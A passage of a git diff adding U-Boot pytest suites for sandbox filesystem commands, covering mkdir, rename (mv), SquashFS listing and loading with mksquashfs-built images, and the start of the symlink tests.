ubman.log.section('Test Case 1 - mkdir'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir1/' in ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + + def test_mkdir2(self, ubman, fs_obj_mkdir): + """ + Test Case 2 - create a directory under a sub-directory + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 2 - mkdir (sub-sub directory)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1/dir2' % fs_type, + '%sls host 0:0 dir1' % fs_type]) + assert('dir2/' in ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1/dir2' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir3(self, ubman, fs_obj_mkdir): + """ + Test Case 3 - trying to create a directory with a non-existing + path should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 3 - mkdir (non-existing path)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 none/dir3' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir4(self, ubman, fs_obj_mkdir): + """ + Test Case 4 - trying to create "." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 4 - mkdir (".")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 .' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir5(self, ubman, fs_obj_mkdir): + """ + Test Case 5 - trying to create ".." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 5 - mkdir ("..")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 ..' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir6(self, ubman, fs_obj_mkdir): + """ + 'Test Case 6 - create as many directories as amount of directory + entries goes beyond a cluster size)' + """ + fs_type,fs_img = fs_obj_mkdir + with ubman.log.section('Test Case 6 - mkdir (create many)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir6' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir6/' in ''.join(output)) + + for i in range(0, 20): + output = ubman.run_command( + '%smkdir host 0:0 dir6/0123456789abcdef%02x' + % (fs_type, i)) + output = ubman.run_command('%sls host 0:0 dir6' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + + output = ubman.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/.' % fs_type) + assert('./' in output) + assert('../' in output) + + output = ubman.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/..' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_rename.py b/test/py/tests/test_fs/test_rename.py new file mode 100644 index 00000000000..e36cff99bb7 --- /dev/null +++ b/test/py/tests/test_fs/test_rename.py @@ -0,0 +1,372 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2025 Gabriel Dalimonte <gabriel.dalimonte@gmail.com> +# +# U-Boot File System:rename Test + + +import pytest + +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestRename(object): + def test_rename1(self, ubman, fs_obj_rename): + """ + Test Case 1 - rename a file (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 1 - rename a file'): + d = 'test1' + src = '%s/file1' % d + dst = '%s/file2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test1'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename2(self, ubman, fs_obj_rename): + """ + Test Case 2 - rename a file to an existing file (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 2 - rename a file to an existing file'): + d = 'test2' + src = '%s/file1' % d + dst = '%s/file_exist' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test2'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename3(self, ubman, fs_obj_rename): + """ + Test Case 3 - rename a directory (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 3 - rename a directory'): + d = 'test3' + src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test3'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename4(self, ubman, fs_obj_rename): + """ + Test Case 4 - rename a directory to an existing directory (successful + mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 4 - rename a directory to an existing directory'): + d = 'test4' + src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/dir1/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test4'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename5(self, ubman, fs_obj_rename): + """ + Test Case 5 - rename a directory to an existing file (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 5 - rename a directory to an existing file'): + d = 'test5' + src = '%s/dir1' % d + dst = '%s/file2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + assert('file2' in ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test5'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename6(self, ubman, fs_obj_rename): + """ + Test Case 6 - rename a file to an existing empty directory (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 6 - rename a file to an existing empty directory'): + d = 'test6' + src = '%s/existing' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir2' in ''.join(output)) + assert('existing' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test6'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename7(self, ubman, fs_obj_rename): + """ + Test Case 7 - rename a directory to a non-empty directory (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 7 - rename a directory to a non-empty directory'): + d = 'test7' + src = '%s/dir1' % d + dst = '%s/dir2' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/dir1/file1' % (ADDR, dst), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + assert('dir2' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test7'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename8(self, ubman, fs_obj_rename): + """ + Test Case 8 - rename a directory inside itself (failed mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 8 - rename a directory inside itself'): + d = 'test8' + src = '%s/dir1' % d + dst = '%s/dir1/dir1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (src), + ]) + assert('file1' in ''.join(output)) + assert('dir1' not in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test8'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename9(self, ubman, fs_obj_rename): + """ + Test Case 9 - rename a directory inside itself with backtracks (failed + mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 9 - rename a directory inside itself with backtracks'): + d = 'test9' + src = '%s/dir1/nested' % d + dst = '%s/dir1/nested/inner/./../../../dir1/nested/inner/another' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, dst), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s/dir1' % (d), + ]) + assert('nested' in ''.join(output)) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (src), + ]) + assert('inner' in ''.join(output)) + assert('nested' not in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename10(self, ubman, fs_obj_rename): + """ + Test Case 10 - rename a file to itself (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 10 - rename a file to itself'): + d = 'test10' + src = '%s/file1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, src), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('file1' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test10'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_rename11(self, ubman, fs_obj_rename): + """ + Test Case 11 - rename a directory to itself (successful mv) + """ + fs_type, fs_img, md5val = fs_obj_rename + with ubman.log.section('Test Case 11 - rename a directory to itself'): + # / at the end here is intentional. Ensures trailing / doesn't + # affect mv producing an updated dst path for fs_rename + d = 'test11/' + src = '%sdir1' % d + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'mv host 0:0 %s %s' % (src, d), + ]) + assert('' == ''.join(output)) + + output = ubman.run_command_list([ + 'load host 0:0 %x /%s/file1' % (ADDR, src), + 'printenv filesize']) + assert('filesize=400' in output) + + output = ubman.run_command_list([ + 'ls host 0:0 %s' % (d), + ]) + assert('dir1' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val['test11'] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_squashfs/sqfs_common.py b/test/py/tests/test_fs/test_squashfs/sqfs_common.py new file mode 100644 index 00000000000..d1621dcce3a --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/sqfs_common.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import shutil +import subprocess + +""" standard test images table: Each table item is a key:value pair +representing the output image name and its respective mksquashfs options. +This table should be modified only when adding support for new compression +algorithms. The 'default' case takes no options but the input and output +names, so it must be assigned with an empty string. +""" +STANDARD_TABLE = { + 'default' : '', + 'lzo_comp_frag' : '', + 'lzo_frag' : '', + 'lzo_no_frag' : '', + 'zstd_comp_frag' : '', + 'zstd_frag' : '', + 'zstd_no_frag' : '', + 'gzip_comp_frag' : '', + 'gzip_frag' : '', + 'gzip_no_frag' : '' +} + +""" EXTRA_TABLE: Set this table's keys and values if you want to make squashfs +images with your own customized options. +""" +EXTRA_TABLE = {} + +# path to source directory used to make squashfs test images +SQFS_SRC_DIR = 'sqfs_src_dir' + +def get_opts_list(): + """ Combines fragmentation and compression options into a list of strings. + + opts_list's firts item is an empty string as STANDARD_TABLE's first item is + the 'default' case. + + Returns: + A list of strings whose items are formed by a compression and a + fragmentation option joined by a whitespace. + """ + # supported compression options only + comp_opts = ['-comp lzo', '-comp zstd', '-comp gzip'] + # file fragmentation options + frag_opts = ['-always-use-fragments', '-always-use-fragments -noF', '-no-fragments'] + + opts_list = [' '] + for comp_opt in comp_opts: + for frag_opt in frag_opts: + opts_list.append(' '.join([comp_opt, frag_opt])) + + return opts_list + +def init_standard_table(): + """ Initializes STANDARD_TABLE values. + + STANDARD_TABLE's keys are pre-defined, and init_standard_table() assigns + the right value for each one of them. + """ + opts_list = get_opts_list() + + for key, value in zip(STANDARD_TABLE.keys(), opts_list): + STANDARD_TABLE[key] = value + +def generate_file(file_name, file_size): + """ Generates a file filled with 'x'. + + Args: + file_name: the file's name. + file_size: the content's length and therefore the file size. + """ + content = 'x' * file_size + + file = open(file_name, 'w') + file.write(content) + file.close() + +def generate_sqfs_src_dir(build_dir): + """ Generates the source directory used to make the SquashFS images. + + The source directory is generated at build_dir, and it has the following + structure: + sqfs_src_dir/ + ├── empty-dir/ + ├── f1000 + ├── f4096 + ├── f5096 + ├── subdir/ + │  └── subdir-file + └── sym -> subdir + + 3 directories, 4 files + + The files in the root dir. are prefixed with an 'f' followed by its size. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + root = os.path.join(build_dir, SQFS_SRC_DIR) + # make root directory + os.makedirs(root) + + # 4096: minimum block size + file_name = 'f4096' + generate_file(os.path.join(root, file_name), 4096) + + # 5096: minimum block size + 1000 chars (fragment) + file_name = 'f5096' + generate_file(os.path.join(root, file_name), 5096) + + # 1000: less than minimum block size (fragment only) + file_name = 'f1000' + generate_file(os.path.join(root, file_name), 1000) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink (target: sub-directory) + os.symlink('subdir', os.path.join(root, 'sym')) + + # empty directory + os.makedirs(os.path.join(root, 'empty-dir')) + +def mksquashfs(args): + """ Runs mksquashfs command. + + Args: + args: mksquashfs options (e.g.: compression and fragmentation). + """ + subprocess.run(['mksquashfs ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def get_mksquashfs_version(): + """ Parses the output of mksquashfs -version. + + Returns: + mksquashfs's version as a float. + """ + out = subprocess.run(['mksquashfs -version'], shell=True, check=True, + capture_output=True, text=True) + # 'out' is: mksquashfs version X (yyyy/mm/dd) ... + return out.stdout.split()[2].split('.')[0:2] + +def check_mksquashfs_version(): + """ Checks if mksquashfs meets the required version. """ + + version = get_mksquashfs_version(); + if int(version[0]) < 4 or int(version[0]) == 4 and int(version[1]) < 4 : + print('Error: mksquashfs is too old, required version: 4.4') + raise AssertionError + +def make_all_images(build_dir): + """ Makes the SquashFS images used in the test suite. + + The image names and respective mksquashfs options are defined in STANDARD_TABLE + and EXTRA_TABLE. The destination is defined by 'build_dir'. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + init_standard_table() + input_path = os.path.join(build_dir, SQFS_SRC_DIR) + + # make squashfs images according to STANDARD_TABLE + for out, opts in zip(STANDARD_TABLE.keys(), STANDARD_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + + # make squashfs images according to EXTRA_TABLE + for out, opts in zip(EXTRA_TABLE.keys(), EXTRA_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + +def clean_all_images(build_dir): + """ Deletes the SquashFS images at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + for image_name in STANDARD_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + + for image_name in EXTRA_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + +def clean_sqfs_src_dir(build_dir): + """ Deletes the source directory at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + path = os.path.join(build_dir, SQFS_SRC_DIR) + shutil.rmtree(path) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py new file mode 100644 index 00000000000..33093f61ac3 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py @@ -0,0 +1,154 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import subprocess +import pytest + +from sqfs_common import SQFS_SRC_DIR, STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +@pytest.mark.requiredtool('md5sum') +def original_md5sum(path): + """ Runs md5sum command. + + Args: + path: path to original file. + Returns: + The original file's checksum as a string. + """ + + out = subprocess.run(['md5sum ' + path], shell=True, check=True, + capture_output=True, text=True) + checksum = out.stdout.split()[0] + + return checksum + +def uboot_md5sum(ubman, address, count): + """ Runs U-Boot's md5sum command. + + Args: + ubman: provides the means to interact with U-Boot's console. + address: address where the file was loaded (e.g.: $kernel_addr_r). + count: file's size. It was named 'count' to match md5sum's respective + argument name. + Returns: + The checksum of the file loaded with sqfsload as a string. + """ + + out = ubman.run_command('md5sum {} {}'.format(address, count)) + checksum = out.split()[-1] + + return checksum + +def sqfs_load_files(ubman, files, sizes, address): + """ Loads files and asserts their checksums. + + Args: + ubman: provides the means to interact with U-Boot's console. + files: list of files to be loaded. + sizes: the sizes of each file. + address: the address where the files should be loaded. + """ + build_dir = ubman.config.build_dir + for (file, size) in zip(files, sizes): + out = ubman.run_command('sqfsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # compare original file's checksum against u-boot's + u_boot_checksum = uboot_md5sum(ubman, address, hex(int(size))) + original_file_path = os.path.join(build_dir, SQFS_SRC_DIR + '/' + file) + original_checksum = original_md5sum(original_file_path) + assert u_boot_checksum == original_checksum + +def sqfs_load_files_at_root(ubman): + """ Calls sqfs_load_files passing the files at the SquashFS image's root. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + + files = ['f4096', 'f5096', 'f1000'] + sizes = ['4096', '5096', '1000'] + address = '$kernel_addr_r' + sqfs_load_files(ubman, files, sizes, address) + +def sqfs_load_files_at_subdir(ubman): + """ Calls sqfs_load_files passing the files at the SquashFS image's subdir. + + This test checks if the path resolution works, since the file is not at the + root directory. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + sqfs_load_files(ubman, files, sizes, address) + +def sqfs_load_non_existent_file(ubman): + """ Calls sqfs_load_files passing an non-existent file to raise an error. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified file. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = ubman.run_command('sqfsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def sqfs_run_all_load_tests(ubman): + """ Runs all the previously defined test cases. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + sqfs_load_files_at_root(ubman) + sqfs_load_files_at_subdir(ubman) + sqfs_load_non_existent_file(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +def test_sqfs_load(ubman): + """ Executes the sqfsload test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + build_dir = ubman.config.build_dir + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + ubman.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_load_tests(ubman) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py new file mode 100644 index 00000000000..adda3b98cda --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py @@ -0,0 +1,148 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import pytest + +from sqfs_common import STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +def sqfs_ls_at_root(ubman): + """ Runs sqfsls at image's root. + + This test checks if all the present files and directories were listed. Also, + it checks if passing the slash or not changes the output, which it shouldn't. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + + no_slash = ubman.run_command('sqfsls host 0') + slash = ubman.run_command('sqfsls host 0 /') + assert no_slash == slash + + expected_lines = ['empty-dir/', '1000 f1000', '4096 f4096', '5096 f5096', + 'subdir/', '<SYM> sym', '4 file(s), 2 dir(s)'] + + output = ubman.run_command('sqfsls host 0') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_empty_dir(ubman): + """ Runs sqfsls at an empty directory. + + This tests checks if sqfsls will print anything other than the 'Empty directory' + message. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + assert ubman.run_command('sqfsls host 0 empty-dir') == 'Empty directory.' + +def sqfs_ls_at_subdir(ubman): + """ Runs sqfsls at the SquashFS image's subdir. + + This test checks if the path resolution works, since the directory is not the + root. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + output = ubman.run_command('sqfsls host 0 subdir') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_symlink(ubman): + """ Runs sqfsls at a SquashFS image's symbolic link. + + This test checks if the symbolic link's target resolution works. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + # since sym -> subdir, the following outputs must be equal + output = ubman.run_command('sqfsls host 0 sym') + output_subdir = ubman.run_command('sqfsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + for line in expected_lines: + assert line in output + +def sqfs_ls_at_non_existent_dir(ubman): + """ Runs sqfsls at a file and at a non-existent directory. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified directory or if it takes a file as an input instead of an actual + directory. In both cases, the output should be the same. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + out_non_existent = ubman.run_command('sqfsls host 0 fff') + out_not_dir = ubman.run_command('sqfsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '** Cannot find directory. **' in out_non_existent + +def sqfs_run_all_ls_tests(ubman): + """ Runs all the previously defined test cases. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + sqfs_ls_at_root(ubman) + sqfs_ls_at_empty_dir(ubman) + sqfs_ls_at_subdir(ubman) + sqfs_ls_at_symlink(ubman) + sqfs_ls_at_non_existent_dir(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +@pytest.mark.singlethread +def test_sqfs_ls(ubman): + """ Executes the sqfsls test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + build_dir = ubman.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. + ubman.restart_uboot() + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + ubman.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_ls_tests(ubman) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_symlink.py b/test/py/tests/test_fs/test_symlink.py new file mode 100644 index 00000000000..9ffd7e6e54d --- /dev/null +++ b/test/py/tests/test_fs/test_symlink.py @@ -0,0 +1,130 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> +# +# U-Boot File System:symlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestSymlink(object): + def test_symlink1(self, ubman, fs_obj_symlink): + """ + Test Case 1 - create a link. and follow it when reading + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link ' % (SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.link' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink2(self, ubman, fs_obj_symlink): + """ + Test Case 2 - create chained links + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 2 - create chained links'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link1 ' % (SMALL_FILE, SMALL_FILE), + 'ln host 0:0 /%s.link1 /SUBDIR/%s.link2' % ( + SMALL_FILE, SMALL_FILE), + 'ln host 0:0 SUBDIR/%s.link2 /%s.link3' % ( + SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.link3' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink3(self, ubman, fs_obj_symlink): + """ + Test Case 3 - replace file/link with link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + output = 